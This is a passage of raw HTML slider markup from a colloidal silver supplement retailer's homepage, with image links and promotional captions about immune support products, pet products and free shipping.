auto;background:transparent;padding:0px;margin-top:0px;margin-bottom:0px;"><div id="rev_slider_1_1" class="rev_slider fullwidthabanner" style="display:none;" data-version="5.4.8.3"><ul><li data-index="rs-47" data-transition="slidingoverlayhorizontal" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="default" data-thumb="https://sovereignsilver.com/wp-content/uploads/2019/05/Celebrating-mothers-everywhere-Homepage-Slider-Image-0r17-100x50.jpg" data-rotate="0" data-saveperformance="off" data-title="Slide" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <img src="https://sovereignsilver.com/wp-content/plugins/revslider/admin/assets/images/dummy.png" alt="Sovereign Silver's May Giveaway Celebrating Mothers Everywhere" title="Sovereign Silver&#8217;s May Giveaway Celebrating Mothers Everywhere" width="1600" height="600" data-lazyload="https://sovereignsilver.com/wp-content/uploads/2019/05/Celebrating-mothers-everywhere-Homepage-Slider-Image-0r17.jpg" data-bgposition="center center" data-bgfit="cover" data-bgrepeat="no-repeat" class="rev-slidebg" data-no-retina><div class="tp-caption tp-shape tp-shapewrapper tp-resizeme" id="slide-47-layer-1" data-x="['left','left','left','left']" data-hoffset="['-189','-189','-189','-189']" data-y="['top','top','top','top']" data-voffset="['2','2','2','2']" data-width="1618" data-height="572" data-whitespace="nowrap" data-type="shape" data-actions='[{"event":"click","action":"simplelink","target":"_self","url":"https:\/\/sovereignsilver.com\/lp\/may-giveaway\/","delay":""}]' data-responsive_offset="on" data-wrapper_class="rev-stream-click" data-frames='[{"delay":0,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 5;background-color:rgba(0,0,0,0);"></div></li><li data-index="rs-12" data-transition="slidingoverlayhorizontal" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="default" data-thumb="https://sovereignsilver.com/wp-content/uploads/2019/02/slide1.b-op-100x50.jpg" data-delay="4000" data-rotate="0" data-saveperformance="off" data-title="Slide" data-param1="Safe,Pure." data-param2=" #1 Selli" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <img src="https://sovereignsilver.com/wp-content/plugins/revslider/admin/assets/images/dummy.png" alt="" title="slide1.b-op" width="1750" height="1167" data-lazyload="https://sovereignsilver.com/wp-content/uploads/2019/02/slide1.b-op.jpg" data-bgposition="center center" data-bgfit="cover" data-bgrepeat="no-repeat" class="rev-slidebg" data-no-retina><div class="tp-caption tp-shape tp-shapewrapper tp-resizeme" id="slide-12-layer-32" data-x="['left','left','left','left']" data-hoffset="['0','0','0','0']" data-y="['top','top','top','top']" data-voffset="['0','0','0','0']" data-width="full" data-height="full" data-whitespace="nowrap" data-type="shape" data-basealign="slide" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 5;background-color:rgba(0,0,0,0.1);"></div><div class="tp-caption tp-resizeme text-shadow" id="slide-12-layer-16" data-x="['left','left','center','center']" data-hoffset="['377','259','0','0']" data-y="['top','top','middle','middle']" data-voffset="['283','202','0','0']" data-fontsize="['40','40','40','20']" data-lineheight="['22','22','22','20']" data-width="['475','475','476','239']" data-height="['77','77','none','21']" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":40,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 6; min-width: 475px; max-width: 475px; max-width: 77px; max-width: 77px; white-space: nowrap; font-size: 40px; line-height: 22px; font-weight: 800; color: #ffffff; letter-spacing: 0px;font-family:Open Sans;">Safe*. Pure. Effective*.</div><div class="tp-caption tp-resizeme" id="slide-12-layer-24" data-x="['center','center','center','center']" data-hoffset="['14','-23','0','-14']" data-y="['middle','middle','middle','middle']" data-voffset="['-139','-116','-40','-34']" data-fontsize="['40','40','40','30']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":40,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 7; white-space: nowrap; font-size: 40px; line-height: 22px; font-weight: 800; color: #0098cd; letter-spacing: 0px;font-family:Open Sans;">Since 1999</div> <a class="tp-caption rev-btn tp-resizeme" href="https://sovereignsilver.com/products/" target="_self" id="slide-12-layer-30" data-x="['left','left','center','center']" data-hoffset="['523','404','0','0']" data-y="['top','top','middle','middle']" data-voffset="['330','252','56','40']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="button" data-actions='' data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"},{"frame":"hover","speed":"0","ease":"Linear.easeNone","to":"o:1;rX:0;rY:0;rZ:0;z:0;","style":"c:rgb(0,0,0);bg:rgb(3,155,255);bc:rgba(0,0,0,1);bs:solid;bw:0 0 0 0;"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[12,12,12,12]" data-paddingright="[35,35,35,35]" data-paddingbottom="[12,12,12,12]" data-paddingleft="[35,35,35,35]" style="z-index: 8; white-space: nowrap; font-size: 17px; line-height: 17px; font-weight: 500; color: rgba(255,255,255,1); letter-spacing: px;font-family:Roboto;background-color:rgb(255,158,27);border-color:rgb(0,0,0);outline:none;box-shadow:none;box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;cursor:pointer;text-decoration: none;">SHOP NOW <i class="fa-icon-chevron-right"></i> </a><div class="tp-caption modern_medium_light tp-resizeme" id="slide-12-layer-34" data-x="['left','left','left','left']" data-hoffset="['388','270','258','69']" data-y="['top','top','top','top']" data-voffset="['25','42','28','15']" data-fontsize="['55','55','55','25']" data-fontweight="['600','600','600','700']" data-color="['rgb(252,252,252)','rgb(255,255,255)','rgb(255,255,255)','rgb(255,255,255)']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":0,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 9; white-space: nowrap; font-size: 55px; font-weight: 600; color: #fcfcfc; letter-spacing: 0px;">Immune Support &</div><div class="tp-caption modern_medium_light tp-resizeme" id="slide-12-layer-35" data-x="['left','left','left','left']" data-hoffset="['483','377','345','114']" data-y="['top','top','top','top']" data-voffset="['84','103','83','44']" data-fontsize="['55','55','55','25']" data-fontweight="['600','600','600','700']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":0,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 10; white-space: nowrap; font-size: 55px; font-weight: 600; color: #ffffff; letter-spacing: 0px;">First Aid Gel</div></li><li data-index="rs-15" data-transition="slidingoverlayhorizontal" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="default" data-thumb="https://sovereignsilver.com/wp-content/uploads/2018/02/afro_woman_happy_forwebsite-100x50.jpg" data-delay="4000" data-rotate="0" data-saveperformance="off" data-title="Slide" data-param1="Safe,Pure." data-param2=" #1 Selli" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description="sdsdsdsd sds sdsdsdsdsds"> <img src="https://sovereignsilver.com/wp-content/plugins/revslider/admin/assets/images/dummy.png" alt="" title="healthy lifestyle" width="1422" height="949" data-lazyload="https://sovereignsilver.com/wp-content/uploads/2018/02/afro_woman_happy_forwebsite.jpg" data-bgposition="center center" data-bgfit="cover" data-bgrepeat="no-repeat" class="rev-slidebg" data-no-retina><div class="tp-caption tp-shape tp-shapewrapper tp-resizeme" id="slide-15-layer-37" data-x="['left','left','left','left']" data-hoffset="['0','0','0','0']" data-y="['top','top','top','top']" data-voffset="['0','0','0','0']" data-fontweight="['500','500','800','800']" data-width="full" data-height="full" data-whitespace="nowrap" data-visibility="['off','off','on','on']" data-type="shape" data-basealign="slide" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 5;background-color:rgba(0,0,0,0.1);"></div><div class="tp-caption tp-resizeme" id="slide-15-layer-1" data-x="['center','center','center','center']" data-hoffset="['343','229','0','0']" data-y="['middle','middle','middle','middle']" data-voffset="['-247','-262','-77','-22']" data-fontsize="['40','40','40','25']" data-color="['rgb(122,122,122)','rgb(122,122,122)','rgb(255,255,255)','rgb(255,255,255)']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 6; white-space: nowrap; font-size: 40px; line-height: 22px; font-weight: 800; color: #7a7a7a; letter-spacing: 0px;font-family:Open Sans;">Bio-Active Silver Hydrosol</div><div class="tp-caption tp-resizeme" id="slide-15-layer-16" data-x="['left','left','center','center']" data-hoffset="['747','524','0','0']" data-y="['top','top','middle','middle']" data-voffset="['72','54','-35','0']" data-fontsize="['40','40','40','20']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 7; white-space: nowrap; font-size: 40px; line-height: 22px; font-weight: 800; color: #34aadc; letter-spacing: 0px;font-family:Open Sans;">Daily Immune Support*</div> <a class="tp-caption tp-resizeme" href="/products/" target="_self" id="slide-15-layer-25" data-x="['center','center','center','center']" data-hoffset="['337','337','337','337']" data-y="['middle','middle','middle','middle']" data-voffset="['381','381','381','381']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-actions='' data-responsive_offset="on" data-frames='[{"delay":40,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 8; white-space: nowrap; font-size: 16px; line-height: 28px; font-weight: 800; color: #717175; letter-spacing: 0px;font-family:Open Sans;text-decoration: none;">SHOP NOW > </a><div class="tp-caption tp-shape tp-shapewrapper tp-resizeme" id="slide-15-layer-28" data-x="['left','left','left','left']" data-hoffset="['1082','889','889','889']" data-y="['top','top','top','top']" data-voffset="['358','429','429','429']" data-width="118" data-height="139" data-whitespace="nowrap" data-type="shape" data-actions='[{"event":"click","action":"simplelink","target":"_self","url":"\/product-comparison-tool\/","delay":""}]' data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 9;background-color:rgba(0,0,0,0.5);border-radius:20px 20px 20px 20px;"></div> <a class="tp-caption tp-resizeme" href="/product-comparison-tool/" target="_self" id="slide-15-layer-29" data-x="['left','left','left','left']" data-hoffset="['1093','900','900','900']" data-y="['top','top','top','top']" data-voffset="['367','439','439','439']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="image" data-actions='' data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 10;text-decoration: none;"><img src="https://sovereignsilver.com/wp-content/plugins/revslider/admin/assets/images/dummy.png" alt="" data-ww="['96px','96px','96px','96px']" data-hh="['96px','96px','96px','96px']" width="700" height="700" data-lazyload="https://sovereignsilver.com/wp-content/uploads/2018/01/microscope.png" data-no-retina> </a><div class="tp-caption tp-resizeme" id="slide-15-layer-27" data-x="['left','left','left','left']" data-hoffset="['1102','910','910','910']" data-y="['top','top','top','top']" data-voffset="['461','530','530','530']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-actions='[{"event":"click","action":"simplelink","target":"_self","url":"\/product-comparison-tool\/","delay":""}]' data-responsive_offset="on" data-frames='[{"delay":40,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 11; white-space: nowrap; font-size: 12px; line-height: 22px; font-weight: 800; color: #ffffff; letter-spacing: 0px;font-family:Open Sans;">COMPARE US</div> <a class="tp-caption rev-btn tp-resizeme" href="https://sovereignsilver.com/products/" target="_self" id="slide-15-layer-35" data-x="['left','left','center','center']" data-hoffset="['904','850','0','0']" data-y="['top','top','middle','middle']" data-voffset="['120','108','19','45']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="button" data-actions='' data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"},{"frame":"hover","speed":"0","ease":"Linear.easeNone","to":"o:1;rX:0;rY:0;rZ:0;z:0;","style":"c:rgb(0,0,0);bg:rgb(3,155,255);bs:solid;bw:0 0 0 0;"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[12,12,12,12]" data-paddingright="[35,35,35,35]" data-paddingbottom="[12,12,12,12]" data-paddingleft="[35,35,35,35]" style="z-index: 12; white-space: nowrap; font-size: 17px; line-height: 17px; font-weight: 500; color: rgba(255,255,255,1); letter-spacing: px;font-family:Roboto;background-color:rgb(255,158,27);border-color:rgba(0,0,0,1);outline:none;box-shadow:none;box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;cursor:pointer;text-decoration: none;">SHOP NOW <i class="fa-icon-chevron-right"></i> </a></li><li data-index="rs-14" data-transition="slidingoverlayhorizontal" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="default" data-thumb="https://sovereignsilver.com/wp-content/uploads/2019/02/slide5-op-100x50.jpg" data-delay="4000" data-rotate="0" data-saveperformance="off" data-title="Slide" data-param1="Safe,Pure." data-param2=" #1 Selli" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description="sdsdsdsd sds sdsdsdsdsds"> <img src="https://sovereignsilver.com/wp-content/plugins/revslider/admin/assets/images/dummy.png" alt="" title="slide5-op" width="1751" height="1167" data-lazyload="https://sovereignsilver.com/wp-content/uploads/2019/02/slide5-op.jpg" data-bgposition="center center" data-bgfit="cover" data-bgrepeat="no-repeat" class="rev-slidebg" data-no-retina><div class="tp-caption tp-shape tp-shapewrapper tp-resizeme" id="slide-14-layer-38" data-x="['left','left','left','left']" data-hoffset="['0','0','0','0']" data-y="['top','top','top','top']" data-voffset="['0','0','0','0']" data-width="full" data-height="full" data-whitespace="nowrap" data-visibility="['off','off','on','on']" data-type="shape" data-basealign="slide" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 5;background-color:rgba(0,0,0,0.1);"></div><div class="tp-caption tp-resizeme" id="slide-14-layer-16" data-x="['left','left','center','left']" data-hoffset="['908','679','0','106']" data-y="['top','top','middle','top']" data-voffset="['211','126','0','102']" data-fontsize="['40','40','40','25']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 6; white-space: nowrap; font-size: 40px; line-height: 22px; font-weight: 800; color: #34aadc; letter-spacing: 0px;font-family:Open Sans;">Because family</div><div class="tp-caption tp-resizeme" id="slide-14-layer-18" data-x="['left','left','left','left']" data-hoffset="['100','100','100','100']" data-y="['top','top','top','top']" data-voffset="['100','100','100','100']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 7; white-space: nowrap; font-size: 20px; line-height: 22px; font-weight: 400; color: #ffffff; letter-spacing: 0px;font-family:Open Sans;"></div><div class="tp-caption tp-resizeme" id="slide-14-layer-19" data-x="['left','left','center','left']" data-hoffset="['910','677','0','121']" data-y="['top','top','middle','top']" data-voffset="['258','168','41','131']" data-fontsize="['40','40','40','20']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 8; white-space: nowrap; font-size: 40px; line-height: 22px; font-weight: 800; color: #34aadc; letter-spacing: 0px;font-family:Open Sans;">is everything.™</div><div class="tp-caption tp-resizeme" id="slide-14-layer-20" data-x="['left','left','center','left']" data-hoffset="['938','717','0','108']" data-y="['top','top','middle','top']" data-voffset="['100','17','-82','9']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="image" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 9;"><img src="https://sovereignsilver.com/wp-content/plugins/revslider/admin/assets/images/dummy.png" alt="" data-ww="['211px','211px','211px','173px']" data-hh="['99px','99px','99px','81px']" width="600" height="273" data-lazyload="https://sovereignsilver.com/wp-content/uploads/2017/09/SS-for-Pets.png" data-no-retina></div> <a class="tp-caption rev-btn tp-resizeme" href="https://sovereignsilver.com/products?=#pets" target="_self" id="slide-14-layer-36" data-x="['left','left','center','left']" data-hoffset="['976','756','0','115']" data-y="['top','top','middle','top']" data-voffset="['302','217','104','166']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="button" data-actions='' data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"},{"frame":"hover","speed":"0","ease":"Linear.easeNone","to":"o:1;rX:0;rY:0;rZ:0;z:0;","style":"c:rgb(255,255,255);bg:rgb(3,155,255);bs:solid;bw:0 0 0 0;"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[12,12,12,12]" data-paddingright="[35,35,35,35]" data-paddingbottom="[12,12,12,12]" data-paddingleft="[35,35,35,35]" style="z-index: 10; white-space: nowrap; font-size: 17px; line-height: 17px; font-weight: 500; color: rgba(255,255,255,1); letter-spacing: px;font-family:Roboto;background-color:rgb(255,158,27);border-color:rgba(0,0,0,1);border-radius:3px 3px 3px 3px;outline:none;box-shadow:none;box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;cursor:pointer;text-decoration: none;">SHOP NOW <i class="fa-icon-chevron-right"></i> </a></li><li data-index="rs-25" data-transition="slidingoverlayhorizontal" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="default" data-thumb="https://sovereignsilver.com/wp-content/uploads/2019/02/wood-table-and-wood-bg-100x50.jpg" data-rotate="0" data-saveperformance="off" data-title="Slide" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <img src="https://sovereignsilver.com/wp-content/plugins/revslider/admin/assets/images/dummy.png" alt="" title="wood-table-and-wood-bg" width="2000" height="1125" data-lazyload="https://sovereignsilver.com/wp-content/uploads/2019/02/wood-table-and-wood-bg.jpg" data-bgposition="center center" data-bgfit="cover" data-bgrepeat="no-repeat" class="rev-slidebg" data-no-retina><div class="tp-caption tp-resizeme" id="slide-25-layer-1" data-x="['left','left','left','left']" data-hoffset="['785','700','497','735']" data-y="['top','top','top','top']" data-voffset="['116','117','76','60']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="image" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 5;"><img src="https://sovereignsilver.com/wp-content/plugins/revslider/admin/assets/images/dummy.png" alt="" data-ww="['174px','174px','139px','69px']" data-hh="['452px','452px','360px','179px']" width="1151" height="2992" data-lazyload="https://sovereignsilver.com/wp-content/uploads/2018/05/SS-16oz-bottle.png" data-no-retina></div><div class="tp-caption modern_medium_fat_white tp-resizeme" id="slide-25-layer-2" data-x="['left','center','center','center']" data-hoffset="['243','0','8','1']" data-y="['top','top','top','top']" data-voffset="['40','44','2','-37']" data-fontsize="['95','95','60','30']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[10,10,10,10]" data-paddingright="[0,0,0,0]" data-paddingbottom="[10,10,10,10]" data-paddingleft="[0,0,0,0]" style="z-index: 6; white-space: nowrap; font-size: 95px; line-height: 100px; letter-spacing: 0px;">FREE SHIPPING</div><div class="tp-caption modern_medium_light tp-resizeme" id="slide-25-layer-3" data-x="['left','center','center','center']" data-hoffset="['240','0','7','0']" data-y="['top','top','top','top']" data-voffset="['128','133','77','14']" data-fontsize="['48','48','40','20']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[10,10,10,10]" data-paddingright="[0,0,0,0]" data-paddingbottom="[10,10,10,10]" data-paddingleft="[0,0,0,0]" style="z-index: 7; white-space: nowrap; font-size: 48px; line-height: 55px; letter-spacing: 0px;">on all Continental US orders $49+</div><div class="tp-caption tp-resizeme" id="slide-25-layer-11" data-x="['left','left','left','left']" data-hoffset="['910','823','598','643']" data-y="['top','top','top','top']" data-voffset="['279','268','206','108']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="image" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 8;"><img src="https://sovereignsilver.com/wp-content/plugins/revslider/admin/assets/images/dummy.png" alt="" data-ww="['155px','155px','117px','63px']" data-hh="['281px','281px','212px','114px']" width="1151" height="2078" data-lazyload="https://sovereignsilver.com/wp-content/uploads/2018/05/SS-2oz-Vertical-Spray.png" data-no-retina></div><div class="tp-caption tp-resizeme" id="slide-25-layer-5" data-x="['left','left','left','left']" data-hoffset="['983','908','659','660']" data-y="['top','top','top','top']" data-voffset="['310','305','214','144']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="image" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 9;"><img src="https://sovereignsilver.com/wp-content/plugins/revslider/admin/assets/images/dummy.png" alt="" data-ww="['141px','141px','111px','57px']" data-hh="['280px','280px','220px','114px']" width="1151" height="2275" data-lazyload="https://sovereignsilver.com/wp-content/uploads/2018/05/SS_Pets_4oz-bottle.png" data-no-retina></div><div class="tp-caption tp-resizeme" id="slide-25-layer-10" data-x="['left','left','left','left']" data-hoffset="['671','587','413','689']" data-y="['top','top','top','top']" data-voffset="['273','272','206','292']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="image" data-responsive_offset="on" 